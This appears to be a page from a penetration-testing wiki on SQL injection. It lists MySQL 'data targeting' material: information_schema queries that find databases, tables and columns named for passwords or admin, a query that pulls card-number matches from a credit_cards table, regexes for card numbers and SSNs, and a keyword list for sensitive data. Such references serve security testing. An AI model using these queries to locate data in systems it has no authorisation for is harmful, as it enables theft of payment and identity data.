SQLInjectionWiki/attackQueries/dataTargeting/mysql.html at master · NetSPI/SQLInjectionWiki · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<h3 id="data-targeting">Data Targeting</h3>

<p class="pageDescription">{{site.data.injectionDescriptions.dataTargeting}}</p>

<h3 id="data-targeting-queries">Data Targeting queries</h3>

<table class="table table-striped table-hover">
    <thead>
        <tr>
            <th>Description</th>
            <th align="left">Query</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td>Database sizes</td>
            <td>SELECT table_schema “Database Name",sum( data_length + index_length ) / 1024 / 1024 “Database Size in MB",sum( data_free )/ 1024 / 1024 “Free Space in MB" FROM information_schema.TABLES GROUP BY table_schema ;</td>
        </tr>
        <tr>
            <td>Database name keyword</td>
            <td>SELECT table_schema “Database Name" FROM information_schema.TABLES WHERE table_schema LIKE “<strong>%passwords%</strong>" GROUP BY table_schema ;</td>
        </tr>
        <tr>
            <td>Table name keyword</td>
            <td>SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema NOT LIKE “information_schema" AND table_name LIKE “<strong>%admin%</strong>“;</td>
        </tr>
        <tr>
            <td>Column name keyword</td>
            <td>SELECT column_name, table_name FROM information_schema.columns WHERE column_name LIKE “<strong>%password%</strong>“;</td>
        </tr>
        <tr>
            <td>Column data regex</td>
            <td>SELECT * from credit_cards WHERE cc_number REGEXP '<strong>^4[0-9]{15}$</strong>';</td>
        </tr>
    </tbody>
</table>


<h3 id="data-targeting-regexes">Data Targeting regexes</h3>

<table class="table table-striped table-hover">
    <thead>
        <tr>
            <th>Description</th>
            <th align="left">Regex</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td>All major credit card providers</td>
            <td>^(?:4[0-9]{12}(?:[0-9]{3})?|(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|6(?:011|5[0-9]{2})[0-9]{12}|(?:2131|1800|35\d{3})\d{11})$</td>
        </tr>
        <tr>
            <td>Unmasked | Masked SSN</td>
            <td>^(\d{3}-?\d{2}-?\d{4}|XXX-XX-XXXX)$</td>
        </tr>
    </tbody>
</table>


<h3 id="data-targeting-keywords">Data Targeting keywords</h3>

<table class="table table-striped table-hover">
    <thead>
        <tr>
            <th>Keyword</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td>credit</td>
        </tr>
        <tr>
            <td>card</td>
        </tr>
        <tr>
            <td>pin</td>
        </tr>
        <tr>
            <td>cvv</td>
        </tr>
        <tr>
            <td>pan</td>
        </tr>
        <tr>
            <td>password</td>
        </tr>
        <tr>
            <td>social</td>
        </tr>
        <tr>
            <td>ssn</td>
        </tr>
        <tr>
            <td>account</td>
        </tr>
        <tr>
            <td>confidential</td>
        </tr>
    </tbody>
</table>